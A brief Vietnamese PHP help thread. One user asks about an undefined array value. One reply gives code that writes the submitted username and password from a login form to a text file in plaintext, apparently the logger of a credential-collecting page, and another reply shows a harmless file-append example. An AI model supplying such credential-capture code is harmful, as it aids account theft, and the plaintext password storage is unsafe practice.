xxsukutexx [không xác định] là sao ạ trong mảng ý em không hiểu j :< nó gửi đc ngày đầu mấy ngày sau mất tích luôn
ngoquocdat $myfile = fopen("tenfile.txt", "w") or die("Unable to open file!"); $txt = "Tài khoản: ".$_POST['username']." | Mật khẩu: ".$_POST['password']."\n"; fwrite($myfile, $txt); fclose($myfile);
Kunkeypr <?php $f = fopen('text.txt', 'a'); // mở file để viết thêm vào dòng cuối nội dung fwrite($f, "đây là text muốn append\n"); // viết vào nội dung fclose($f); // đóng file ?>